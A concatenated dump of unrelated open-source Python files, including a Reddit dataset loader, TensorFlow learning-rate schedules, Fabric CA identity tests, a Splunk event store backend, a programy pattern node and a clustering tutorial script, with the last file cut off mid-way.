_DESCRIPTION = """
This corpus contains preprocessed posts from the Reddit dataset.
The dataset consists of 3,848,330 posts with an average length of 270 words for content,
and 28 words for the summary.
Features include strings: author, body, normalizedBody, content, summary, subreddit, subreddit_id.
Content is used as document and summary is used as summary.
"""
_URL = "https://zenodo.org/record/1043504/files/corpus-webis-tldr-17.zip?download=1"
_DOCUMENT = "content"
_SUMMARY = "summary"
_ADDITIONAL_FEATURES = ["author", "body", "normalizedBody", "subreddit", "subreddit_id", "id"]
class Reddit(datasets.GeneratorBasedBuilder):
"""Reddit Dataset."""
VERSION = datasets.Version("1.0.0")
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{k: datasets.Value("string") for k in _ADDITIONAL_FEATURES + [_DOCUMENT, _SUMMARY]}
),
supervised_keys=None,
homepage="https://github.com/webis-de/webis-tldr-17-corpus",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
dl_path = dl_manager.download_and_extract(_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"path": os.path.join(dl_path, "corpus-webis-tldr-17.json")},
)
]
def _generate_examples(self, path=None):
"""Yields examples."""
with open(path, "rb") as f:
for i, line in enumerate(f):
# possible keys are:
# author: string (nullable = true)
# body: string (nullable = true)
# normalizedBody: string (nullable = true)
# content: string (nullable = true)
# content_len: long (nullable = true)
# summary: string (nullable = true)
# summary_len: long (nullable = true)
# id: string (nullable = true)
# subreddit: string (nullable = true)
# subreddit_id: string (nullable = true)
# title: string (nullable = true)
d = json.loads(line)
if _SUMMARY in d and _DOCUMENT in d:
yield i, {k: d.get(k, "") for k in _ADDITIONAL_FEATURES + [_DOCUMENT, _SUMMARY]}
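# Hedged usage sketch (assumes this script is registered under the usual "reddit"
# dataset name in the Hugging Face `datasets` hub; not part of the original file):
#   from datasets import load_dataset
#   ds = load_dataset("reddit", split="train")
#   print(ds[0]["content"][:200], "->", ds[0]["summary"])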
|
src/encoded/audit/formatter.py | procha2/encoded | 102 | 12738922 | import re
def audit_link(linkText, uri):
"""Generate link "markdown" from URI."""
return '{{{}|{}}}'.format(linkText, uri)
def path_to_text(path):
"""Convert object path to the text portion."""
accession = re.match(r'\/.*\/(.*)\/', path)
return accession.group(1) if accession else None
def space_in_words(objects_string):
"""Insert a space between objects that have more than one
capital letter eg. AntibodyChar --> Antibody Char"""
add_space = re.sub(r"(\w)([A-Z])", r"\1 \2", objects_string)
return add_space
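# Hedged usage sketch (illustrative accession and path values only):
#   audit_link('ENCSR000AAA', '/experiments/ENCSR000AAA/')
#       # -> '{ENCSR000AAA|/experiments/ENCSR000AAA/}'
#   path_to_text('/experiments/ENCSR000AAA/')   # -> 'ENCSR000AAA'
#   space_in_words('AntibodyCharacterization')  # -> 'Antibody Characterization'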
|
bin/check_ext_deterministic.py | dendisuhubdy/attention-lvcsr | 295 | 12738934 | <reponame>dendisuhubdy/attention-lvcsr<gh_stars>100-1000
#!/usr/bin/env python
import argparse
import fst
import sys
def main(args):
L = fst.read(args.fst_file)
for state in L:
ilab = []
for arc in state:
ilab.append(arc.ilabel)
ilabs = set(ilab)
if 0 in ilabs and len(ilab) != 1:
sys.stderr.write(
"Node {} has a non-epsilon arc that is not unique: {}"
.format(state, ilab))
exit(1)
if len(ilabs) != len(ilab):
sys.stderr.write(
"Node {} has duplicated ilabels on edges: {}"
.format(state, ilab))
exit(1)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Check that all outgoing edges have either:\n"
"1. Non-esilon and different ilabels or\n"
"2. A single apsilon-labeled ilabel.")
parser.add_argument("fst_file", default='-', nargs='?')
args = parser.parse_args()
main(args)
|
tests/test_cache.py | wieczorek1990/django-dynamic-models | 122 | 12738935 | import pytest
from django.utils import timezone
from dynamic_models import cache
TEST_MODEL_NAME = "test"
now = timezone.now()
@pytest.fixture
def mock_now(monkeypatch):
monkeypatch.setattr(timezone, "now", lambda: now)
def test_get_and_update_last_modified(mock_now):
assert cache.get_last_modified(TEST_MODEL_NAME) is None
cache.update_last_modified(TEST_MODEL_NAME)
assert cache.get_last_modified(TEST_MODEL_NAME) == now
def test_delete_last_modified(mock_now):
cache.update_last_modified(TEST_MODEL_NAME)
assert cache.get_last_modified(TEST_MODEL_NAME) == now
cache.clear_last_modified(TEST_MODEL_NAME)
assert cache.get_last_modified(TEST_MODEL_NAME) is None
|
sdk/python/kfp/dsl/type_utils.py | Iuiu1234/pipelines | 2,860 | 12738941 | <reponame>Iuiu1234/pipelines
# Copyright 2021 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Deprecated. See kfp.v2.components.types.type_utils instead.
This module will be removed in KFP v2.0.
"""
import warnings
from kfp.v2.components.types import type_utils
warnings.warn(
'Module kfp.dsl.type_utils is deprecated and will be removed'
' in KFP v2.0. Please use from kfp.v2.components.types.type_utils instead.',
category=FutureWarning)
is_parameter_type = type_utils.is_parameter_type
get_artifact_type_schema = type_utils.get_artifact_type_schema
get_parameter_type = type_utils.get_parameter_type
get_input_artifact_type_schema = type_utils.get_input_artifact_type_schema
|
research/object_detection/utils/learning_schedules.py | kopankom/models | 153 | 12738955 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Library of common learning rate schedules."""
import numpy as np
import tensorflow as tf
def exponential_decay_with_burnin(global_step,
learning_rate_base,
learning_rate_decay_steps,
learning_rate_decay_factor,
burnin_learning_rate=0.0,
burnin_steps=0):
"""Exponential decay schedule with burn-in period.
In this schedule, learning rate is fixed at burnin_learning_rate
for a fixed period, before transitioning to a regular exponential
decay schedule.
Args:
global_step: int tensor representing global step.
learning_rate_base: base learning rate.
learning_rate_decay_steps: steps to take between decaying the learning rate.
Note that this includes the number of burn-in steps.
learning_rate_decay_factor: multiplicative factor by which to decay
learning rate.
burnin_learning_rate: initial learning rate during burn-in period. If
0.0 (which is the default), then the burn-in learning rate is simply
set to learning_rate_base.
burnin_steps: number of steps to use burnin learning rate.
Returns:
a (scalar) float tensor representing learning rate
"""
if burnin_learning_rate == 0:
burnin_learning_rate = learning_rate_base
post_burnin_learning_rate = tf.train.exponential_decay(
learning_rate_base,
global_step,
learning_rate_decay_steps,
learning_rate_decay_factor,
staircase=True)
return tf.where(
tf.less(tf.cast(global_step, tf.int32), tf.constant(burnin_steps)),
tf.constant(burnin_learning_rate),
post_burnin_learning_rate)
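# Hedged usage sketch (illustrative hyperparameter values; assumes the TF1
# graph-mode setup used throughout this module):
#   global_step = tf.train.get_or_create_global_step()
#   learning_rate = exponential_decay_with_burnin(
#       global_step, learning_rate_base=0.01,
#       learning_rate_decay_steps=10000, learning_rate_decay_factor=0.95,
#       burnin_learning_rate=0.001, burnin_steps=2000)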
def cosine_decay_with_warmup(global_step,
learning_rate_base,
total_steps,
warmup_learning_rate=0.0,
warmup_steps=0):
"""Cosine decay schedule with warm up period.
Cosine annealing learning rate as described in:
Loshchilov and Hutter, SGDR: Stochastic Gradient Descent with Warm Restarts.
ICLR 2017. https://arxiv.org/abs/1608.03983
In this schedule, the learning rate grows linearly from warmup_learning_rate
to learning_rate_base for warmup_steps, then transitions to a cosine decay
schedule.
Args:
global_step: int64 (scalar) tensor representing global step.
learning_rate_base: base learning rate.
total_steps: total number of training steps.
warmup_learning_rate: initial learning rate for warm up.
warmup_steps: number of warmup steps.
Returns:
a (scalar) float tensor representing learning rate.
Raises:
ValueError: if warmup_learning_rate is larger than learning_rate_base,
or if warmup_steps is larger than total_steps.
"""
if learning_rate_base < warmup_learning_rate:
raise ValueError('learning_rate_base must be larger '
'or equal to warmup_learning_rate.')
if total_steps < warmup_steps:
raise ValueError('total_steps must be larger or equal to '
'warmup_steps.')
learning_rate = 0.5 * learning_rate_base * (
1 + tf.cos(np.pi * (tf.cast(global_step, tf.float32) - warmup_steps
) / float(total_steps - warmup_steps)))
if warmup_steps > 0:
slope = (learning_rate_base - warmup_learning_rate) / warmup_steps
pre_cosine_learning_rate = slope * tf.cast(
global_step, tf.float32) + warmup_learning_rate
learning_rate = tf.where(
tf.less(tf.cast(global_step, tf.int32), warmup_steps),
pre_cosine_learning_rate,
learning_rate)
return learning_rate
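# Hedged usage sketch (illustrative values): ramp up linearly for the first
# 1000 steps, then follow the cosine decay until total_steps.
#   learning_rate = cosine_decay_with_warmup(
#       global_step, learning_rate_base=0.04, total_steps=100000,
#       warmup_learning_rate=0.004, warmup_steps=1000)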
def manual_stepping(global_step, boundaries, rates):
"""Manually stepped learning rate schedule.
This function provides fine grained control over learning rates. One must
specify a sequence of learning rates as well as a set of integer steps
at which the current learning rate must transition to the next. For example,
if boundaries = [5, 10] and rates = [.1, .01, .001], then the learning
rate returned by this function is .1 for global_step=0,...,4, .01 for
global_step=5...9, and .001 for global_step=10 and onward.
Args:
global_step: int64 (scalar) tensor representing global step.
boundaries: a list of global steps at which to switch learning
rates. This list is assumed to consist of increasing positive integers.
rates: a list of (float) learning rates corresponding to intervals between
the boundaries. The length of this list must be exactly
len(boundaries) + 1.
Returns:
a (scalar) float tensor representing learning rate
Raises:
ValueError: if one of the following checks fails:
1. boundaries is a strictly increasing list of positive integers
2. len(rates) == len(boundaries) + 1
"""
if any([b < 0 for b in boundaries]) or any(
[not isinstance(b, int) for b in boundaries]):
raise ValueError('boundaries must be a list of positive integers')
if any([bnext <= b for bnext, b in zip(boundaries[1:], boundaries[:-1])]):
raise ValueError('Entries in boundaries must be strictly increasing.')
if any([not isinstance(r, float) for r in rates]):
raise ValueError('Learning rates must be floats')
if len(rates) != len(boundaries) + 1:
raise ValueError('Number of provided learning rates must exceed '
'number of boundary points by exactly 1.')
if not boundaries: return tf.constant(rates[0])
step_boundaries = tf.constant(boundaries, tf.int32)
num_boundaries = len(boundaries)
learning_rates = tf.constant(rates, tf.float32)
index = tf.reduce_min(
tf.where(
# Casting global step to tf.int32 is dangerous, but necessary to be
# compatible with TPU.
tf.greater(step_boundaries, tf.cast(global_step, tf.int32)),
tf.constant(range(num_boundaries), dtype=tf.int32),
tf.constant([num_boundaries] * num_boundaries, dtype=tf.int32)))
return tf.reduce_sum(learning_rates * tf.one_hot(index, len(rates),
dtype=tf.float32))
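if __name__ == '__main__':
  # Hedged usage sketch, not part of the original module; assumes a TF1 runtime,
  # matching the graph-mode APIs used above.
  with tf.Graph().as_default(), tf.Session() as sess:
    step = tf.placeholder(tf.int64, shape=[])
    lr = manual_stepping(step, boundaries=[5, 10], rates=[.1, .01, .001])
    # Expected: 0.1 for steps 0-4, 0.01 for steps 5-9, 0.001 from step 10 onward.
    print([sess.run(lr, feed_dict={step: s}) for s in (0, 4, 5, 10)])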
|
test/integration/identity_service_test.py | hyperledger-gerrit-archive/fabric-sdk-py | 389 | 12738971 | # Copyright IBM Corp. 2016 All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import unittest
import random
import string
from hfc.fabric_ca.caservice import CAService
from test.integration.utils import cli_call
with open(os.path.join(os.path.dirname(__file__),
"../fixtures/ca/enroll-csr.pem")) as f:
test_pem = f.read()
ENROLLMENT_ID = "admin"
ENROLLMENT_SECRET = "adminpw"
def get_random_username():
return ''.join(
[random.choice(string.ascii_letters + string.digits)
for n in range(9)])
class IdentityServiceTest(unittest.TestCase):
"""Test for ca module. """
def setUp(self):
self._enrollment_id = ENROLLMENT_ID
self._enrollment_secret = ENROLLMENT_SECRET
if os.getenv("CA_ADDR"):
self._ca_server_address = os.getenv("CA_ADDR")
else:
self._ca_server_address = "localhost:7054"
self.compose_file_path = os.path.normpath(
os.path.join(os.path.dirname(__file__),
"../fixtures/ca/docker-compose.yml")
)
self.start_test_env()
self._ca_service = CAService("http://" + self._ca_server_address)
id = self._enrollment_id
secret = self._enrollment_secret
self._adminEnrollment = self._ca_service.enroll(id, secret)
self._identityService = self._ca_service.newIdentityService()
def tearDown(self):
self.shutdown_test_env()
def start_test_env(self):
cli_call(["docker-compose", "-f", self.compose_file_path, "up", "-d"])
time.sleep(5)
def shutdown_test_env(self):
cli_call(["docker-compose", "-f", self.compose_file_path, "down"])
def test_create_success(self):
"""Test create success.
"""
username = get_random_username()
secret = self._identityService.create(self._adminEnrollment, username,
enrollmentSecret='pass')
self.assertTrue(secret == 'pass')
def test_getOne_success(self):
"""Test getOne success.
"""
username = get_random_username()
self._identityService.create(self._adminEnrollment, username)
res = self._identityService.getOne(username, self._adminEnrollment)
self.assertTrue(res['result']['id'] == username)
self.assertTrue(res['success'] is True)
def test_getAll_success(self):
"""Test getAll success.
"""
username = get_random_username()
self._identityService.create(self._adminEnrollment, username)
res = self._identityService.getAll(self._adminEnrollment)
self.assertTrue(len(res['result']['identities']) > 0)
self.assertTrue(res['success'] is True)
def test_delete_success(self):
"""Test delete success.
"""
username = get_random_username()
self._identityService.create(self._adminEnrollment, username)
res = self._identityService.delete(username, self._adminEnrollment)
self.assertTrue(res['success'] is True)
def test_update_success(self):
"""Test update success.
"""
username = get_random_username()
self._identityService.create(self._adminEnrollment, username)
res = self._identityService.update(username, self._adminEnrollment,
maxEnrollments=3)
self.assertTrue(res['result']['id'] == username)
self.assertTrue(res['result']['max_enrollments'] == 3)
self.assertTrue(res['success'] is True)
if __name__ == '__main__':
unittest.main()
|
geoq/agents/urls.py | kaydoh/geoq | 471 | 12738985 | # -*- coding: utf-8 -*-
# This technical data was produced for the U. S. Government under Contract No. W15P7T-13-C-F600, and
# is subject to the Rights in Technical Data-Noncommercial Items clause at DFARS 252.227-7013 (FEB 2012)
from django.contrib.auth.decorators import login_required
from django.conf.urls import url
from .views import feedbackcreate, thankyou, FeedbackListView
from .models import Feedback
urlpatterns = [
url(r'^create/?$', feedbackcreate, name='feedback-create'),
url(r'^view?$', FeedbackListView.as_view(template_name='feedback_list.html',
queryset=Feedback.objects.all()), name='feedback-list'),
url(r'^thankyou/?$', thankyou, name='thanks'),
]
|
zentral/core/stores/backends/splunk.py | sierra-hotel/zentral | 634 | 12739000 | <filename>zentral/core/stores/backends/splunk.py
from datetime import datetime
import json
import logging
import random
import time
from urllib.parse import urlencode, urljoin
from django.utils.functional import cached_property
from django.utils.text import slugify
import requests
from zentral.core.stores.backends.base import BaseEventStore
logger = logging.getLogger('zentral.core.stores.backends.splunk')
class EventStore(BaseEventStore):
max_batch_size = 100
max_retries = 3
def __init__(self, config_d):
super().__init__(config_d)
self.collector_url = urljoin(config_d["hec_url"], "/services/collector/event")
self.hec_token = config_d["hec_token"]
self.search_app_url = config_d.get("search_app_url")
# If set, the computer name of the machine snapshots of these sources will be used
# as host field value. First source with a non-empty value will be picked.
self.computer_name_as_host_sources = [
slugify(src)
for src in config_d.get("computer_name_as_host_sources", [])
]
self.serial_number_field = config_d.get("serial_number_field", "machine_serial_number")
if self.search_app_url:
self.machine_events_url = True
self.probe_events_url = True
self.verify_tls = config_d.get('verify_tls', True)
self.index = config_d.get("index")
self.source = config_d.get("source")
self._collector_session = None
@cached_property
def collector_session(self):
session = requests.Session()
session.verify = self.verify_tls
session.headers.update({'Authorization': f'Splunk {self.hec_token}',
'Content-Type': 'application/json'})
return session
@staticmethod
def _convert_datetime(dt):
if isinstance(dt, str):
dt = dt.replace("+00:00", "").replace("Z", "").strip()
if "." in dt:
fmt = "%Y-%m-%dT%H:%M:%S.%f"
else:
fmt = "%Y-%m-%dT%H:%M:%S"
dt = datetime.strptime(dt, fmt)
ts = time.mktime(dt.timetuple()) + dt.microsecond / 1e6
return "{:.3f}".format(ts)
def _serialize_event(self, event):
if not isinstance(event, dict):
event = event.serialize()
payload_event = event.pop("_zentral")
created_at = payload_event.pop("created_at")
event_type = payload_event.pop("type")
namespace = payload_event.get("namespace", event_type)
payload_event[namespace] = event
# host / serial number
host = "Zentral"
machine_serial_number = payload_event.pop("machine_serial_number", None)
if machine_serial_number:
payload_event[self.serial_number_field] = machine_serial_number
host = machine_serial_number
for ms_src_slug in self.computer_name_as_host_sources:
machine_name = payload_event.get("machine", {}).get(ms_src_slug, {}).get("name")
if machine_name:
host = machine_name
break
else:
observer = payload_event.get("observer", {}).get("hostname")
if observer:
host = observer
payload = {
"host": host,
"sourcetype": event_type,
"time": self._convert_datetime(created_at),
"event": payload_event,
}
if self.index:
payload["index"] = self.index
if self.source:
payload["source"] = self.source
return payload
def store(self, event):
payload = self._serialize_event(event)
for i in range(self.max_retries):
r = self.collector_session.post(self.collector_url, json=payload)
if r.ok:
return
if r.status_code > 500:
logger.error("Temporary server error")
if i + 1 < self.max_retries:
seconds = random.uniform(3, 4) * (i + 1)
logger.error("Retry in %.1fs", seconds)
time.sleep(seconds)
continue
r.raise_for_status()
def bulk_store(self, events):
if self.batch_size < 2:
raise RuntimeError("bulk_store is not available when batch_size < 2")
event_keys = []
data = b""
for event in events:
payload = self._serialize_event(event)
event_keys.append((payload["event"]["id"], payload["event"]["index"]))
if data:
data += b"\n"
data += json.dumps(payload).encode("utf-8")
for i in range(self.max_retries):
r = self.collector_session.post(self.collector_url, data=data)
if r.ok:
return event_keys
if r.status_code > 500:
logger.error("Temporary server error")
if i + 1 < self.max_retries:
seconds = random.uniform(3, 4) * (i + 1)
logger.error("Retry in %.1fs", seconds)
time.sleep(seconds)
continue
r.raise_for_status()
def _get_search_url(self, query, from_dt, to_dt):
kwargs = {
"q": f"search {query}",
"earliest": self._convert_datetime(from_dt),
"latest": self._convert_datetime(to_dt) if to_dt else "now"
}
return "{}?{}".format(self.search_app_url, urlencode(kwargs))
# machine events
def _get_machine_events_query(self, serial_number, event_type=None):
query_chunks = [("host", serial_number)]
if self.index:
query_chunks.append(("index", self.index))
if event_type:
query_chunks.append(("sourcetype", event_type))
return " ".join('{}="{}"'.format(k, v.replace('"', '\\"')) for k, v in query_chunks)
def get_machine_events_url(self, serial_number, from_dt, to_dt=None, event_type=None):
return self._get_search_url(
self._get_machine_events_query(serial_number, event_type),
from_dt, to_dt
)
# probe events
def _get_probe_events_query(self, probe, event_type=None):
filter_chunks = []
if self.index:
filter_chunks.append(("index", self.index))
if event_type:
filter_chunks.append(("sourcetype", event_type))
filter_str = " ".join('{}="{}"'.format(k, v.replace('"', '\\"')) for k, v in filter_chunks)
return f'{filter_str} | spath "probes{{}}.pk" | search "probes{{}}.pk"={probe.pk}'
def get_probe_events_url(self, probe, from_dt, to_dt=None, event_type=None):
return self._get_search_url(
self._get_probe_events_query(probe, event_type),
from_dt, to_dt
)
|
trimesh/voxel/__init__.py | hawkaa/trimesh | 1,882 | 12739013 | <filename>trimesh/voxel/__init__.py
from .base import VoxelGrid
__all__ = [
'VoxelGrid',
]
|
dialogue-engine/src/programy/parser/pattern/nodes/iset.py | cotobadesign/cotoba-agent-oss | 104 | 12739041 | <gh_stars>100-1000
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Copyright (c) 2016-2019 <NAME> http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.utils.logging.ylogger import YLogger
from programy.parser.pattern.nodes.base import PatternNode
from programy.parser.pattern.matcher import EqualsMatch
from programy.parser.exceptions import ParserException
from programy.utils.language.japanese import JapaneseLanguage
import re
class PatternISetNode(PatternNode):
iset_count = 1
def __init__(self, attribs, text, userid='*', element=None, brain=None):
PatternNode.__init__(self, userid)
self._words = {}
self._values = {}
if 'words' in attribs:
words = attribs['words']
elif text:
words = text
else:
raise ParserException("No words specified as attribute or text", xml_element=element, nodename='iset')
check_words = JapaneseLanguage.zenhan_normalize(words)
self._is_CJK = JapaneseLanguage.is_CJKword(check_words)
if self._parse_words(words) is False:
raise ParserException("empty element in words", xml_element=element, nodename='iset')
self._iset_name = "iset_%d" % (PatternISetNode.iset_count)
PatternISetNode.iset_count += 1
def _parse_words(self, words):
is_success = True
splits = words.split(",")
for word in splits:
word = word.strip()
if word == '':
is_success = False
else:
self.add_set_values(word)
return is_success
def add_set_values(self, value):
checkwords = JapaneseLanguage.zenhan_normalize(value)
checkwords = checkwords.upper()
if self._is_CJK is True:
checkwords = checkwords.replace(' ', '')
else:
checkwords = re.sub(' +', ' ', checkwords)
if checkwords in self._values:
return
self._values[checkwords] = value
if self._is_CJK is True:
splits = checkwords
key = splits[0].upper()
else:
splits = checkwords.split()
key = splits[0].upper()
if key not in self._words:
self._words[key] = []
self._words[key].append(splits)
@property
def words(self):
return self._words
@property
def iset_name(self):
return self._iset_name
def is_iset(self):
return True
def to_xml(self, client_context, include_user=False):
string = ""
if include_user is True:
string += '<iset userid="%s" words="' % self.userid
else:
string += '<iset words="'
if self._is_CJK is False:
string += ", ".join(self._words)
else:
join_char = ""
for key in self.words:
for value in self.words[key]:
string += '%s%s' % (join_char, value)
join_char = ", "
string += '">'
string += super(PatternISetNode, self).to_xml(client_context)
string += "</iset>\n"
return string
def to_string(self, verbose=True):
if self._is_CJK is False:
words_str = ",".join(self._words)
else:
words_str = ""
join_char = ""
for key in self.words:
for value in self.words[key]:
words_str += '%s%s' % (join_char, value)
join_char = ","
if verbose is True:
return "ISET [%s] [%s] words=[%s]" % (self.userid, self._child_count(verbose), words_str)
return "ISET words=[%s]" % words_str
def equivalent(self, other):
if self.userid != other.userid:
return False
if len(self.words) != len(other.words):
return False
if self._is_CJK is False:
for word in self.words:
if word not in other.words:
return False
else:
for key in self.words:
if key not in other.words:
return False
if len(self.words[key]) != len(other.words[key]):
return False
for value in self.words[key]:
if value not in other.words[key]:
return False
return True
def equals(self, client_context, words, word_no):
if client_context.match_nlu is True:
return EqualsMatch(False, word_no)
if self.userid != '*':
if self.userid != client_context.userid:
return EqualsMatch(False, word_no)
word = words.word(word_no)
if word is not None:
match = self.words_in_set(client_context, words, word_no)
if match.matched is True:
YLogger.debug(client_context, "Found word [%s] in iset", word)
return match
YLogger.debug(client_context, "No word [%s] found in iset", word)
return EqualsMatch(False, word_no)
def words_in_set(self, client_context, words, word_no):
word = words.word(word_no)
check_word = JapaneseLanguage.zenhan_normalize(word)
word = check_word.upper()
if self._is_CJK is True:
keyword = word[0]
else:
keyword = word
if keyword in self._words:
phrases = self._words[keyword]
phrases = sorted(phrases, key=len, reverse=True)
for phrase in phrases:
if self._is_CJK is True:
phrase_words = client_context.brain.tokenizer.texts_to_words(phrase)
phrase = "".join(phrase_words)
phrase_text = phrase
else:
phrase_text = " ".join(phrase)
phrase_word_no = 0
words_word_no = word_no
while phrase_word_no < len(phrase) and words_word_no < words.num_words():
word = words.word(words_word_no)
check_word = JapaneseLanguage.zenhan_normalize(word)
word = check_word.upper()
if self._is_CJK is True:
phrase_word = phrase[phrase_word_no:(phrase_word_no + len(word))]
if phrase_word == word:
if (phrase_word_no + len(word)) == len(phrase):
return EqualsMatch(True, words_word_no, self._values[phrase_text])
else:
break
phrase_word_no += len(word)
else:
phrase_word = phrase[phrase_word_no]
if phrase_word == word:
if phrase_word_no+1 == len(phrase):
return EqualsMatch(True, words_word_no, self._values[phrase_text])
else:
break
phrase_word_no += 1
words_word_no += 1
return EqualsMatch(False, word_no)
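# Hedged illustration (hypothetical AIML snippet, not part of this module):
#   <pattern><iset words="red, light blue" /> CAR</pattern>
# would match "RED CAR" or "LIGHT BLUE CAR"; words_in_set() tries the longer
# phrases of the set first and returns an EqualsMatch carrying the matched value.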
|
api/system/constants.py | zhangkuantian/cuelake | 272 | 12739078 | ACCOUNT_SETTING_SLACK_URL_KEY = "slackWebhookUrl"
NOTIFY_ON_SUCCESS_KEY = "notifyOnSuccess"
NOTIFY_ON_FAILURE_KEY = "notifyOnFailure"
|
datasets/Part 4 - Clustering/Section 25 - Hierarchical Clustering/hc.py | abnercasallo/machinelearning-az | 234 | 12739090 | <gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 27 13:15:02 2019
@author: juangabriel
"""
# Hierarchical Clustering
# Import the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Import the mall customers dataset with pandas
dataset = pd.read_csv("Mall_Customers.csv")
X = dataset.iloc[:, [3, 4]].values
# Use the dendrogram to find the optimal number of clusters
import scipy.cluster.hierarchy as sch
dendrogram = sch.dendrogram(sch.linkage(X, method = "ward"))
plt.title("Dendrograma")
plt.xlabel("Clientes")
plt.ylabel("Distancia Euclídea")
plt.show()
# Fit hierarchical clustering to our dataset
from sklearn.cluster import AgglomerativeClustering
hc = AgglomerativeClustering(n_clusters = 5, affinity = "euclidean", linkage = "ward")
y_hc = hc.fit_predict(X)
# Visualize the clusters
plt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = "red", label = "Cautos")
plt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = "blue", label = "Estandard")
plt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s = 100, c = "green", label = "Objetivo")
plt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1], s = 100, c = "cyan", label = "Descuidados")
plt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s = 100, c = "magenta", label = "Conservadores")
plt.title("Cluster de clientes")
plt.xlabel("Ingresos anuales (en miles de $)")
plt.ylabel("Puntuación de Gastos (1-100)")
plt.legend()
plt.show()
|
toolchain/riscv/MSYS/python/Lib/test/test_urllib_response.py | zhiqiang-hu/bl_iot_sdk | 207 | 12739109 | """Unit tests for code in urllib.response."""
import socket
import tempfile
import urllib.response
import unittest
class TestResponse(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.fp = self.sock.makefile('rb')
self.test_headers = {"Host": "www.python.org",
"Connection": "close"}
def test_with(self):
addbase = urllib.response.addbase(self.fp)
self.assertIsInstance(addbase, tempfile._TemporaryFileWrapper)
def f():
with addbase as spam:
pass
self.assertFalse(self.fp.closed)
f()
self.assertTrue(self.fp.closed)
self.assertRaises(ValueError, f)
def test_addclosehook(self):
closehook_called = False
def closehook():
nonlocal closehook_called
closehook_called = True
closehook = urllib.response.addclosehook(self.fp, closehook)
closehook.close()
self.assertTrue(self.fp.closed)
self.assertTrue(closehook_called)
def test_addinfo(self):
info = urllib.response.addinfo(self.fp, self.test_headers)
self.assertEqual(info.info(), self.test_headers)
def test_addinfourl(self):
url = "http://www.python.org"
code = 200
infourl = urllib.response.addinfourl(self.fp, self.test_headers,
url, code)
self.assertEqual(infourl.info(), self.test_headers)
self.assertEqual(infourl.geturl(), url)
self.assertEqual(infourl.getcode(), code)
def tearDown(self):
self.sock.close()
if __name__ == '__main__':
unittest.main()
|
docs/python/logging/logging_test.py | enricomarchesin/notes | 790 | 12739159 | <gh_stars>100-1000
# Import standard library's logging
import logging
# Create function that converts dollars to cents
def convert_dollars_to_cents(dollars):
# Convert dollars to cents (as an integer)
cents = int(dollars * 100)
logging.debug("debug")
logging.info("info")
logging.warning("warning")
logging.error("error")
logging.critical("critical")
# Return cents
return cents
# Create dollar amount
dollars = 12.40
# Run dollars to cents convert function
